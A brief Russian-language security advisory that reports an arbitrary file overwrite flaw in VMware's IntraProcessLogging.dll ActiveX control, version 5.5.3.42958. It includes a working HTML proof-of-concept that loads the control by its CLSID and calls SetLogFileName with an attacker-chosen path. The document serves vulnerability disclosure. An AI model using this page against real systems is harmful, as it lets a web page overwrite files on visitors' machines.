Программа: VMware IntraProcessLogging.dll 5.5.3.42958
Найденная уязвимость позволяет перезаписать произвольные файлы на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в IntraProcessLogging.dll. Атакующий может перезаписать произвольные файлы на целевой системе.
Пример:
<HTML>
<BODY>
<object id=ctrl classid="clsid:{AF13B07E-28A1-4CAC-9C9A-EC582E354A24}"></object>
<SCRIPT>
function Do_it()
{
File = "c:\\arbitrary_file.txt"
ctrl.SetLogFileName(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Proof of
Concept">
</BODY>
</HTML>
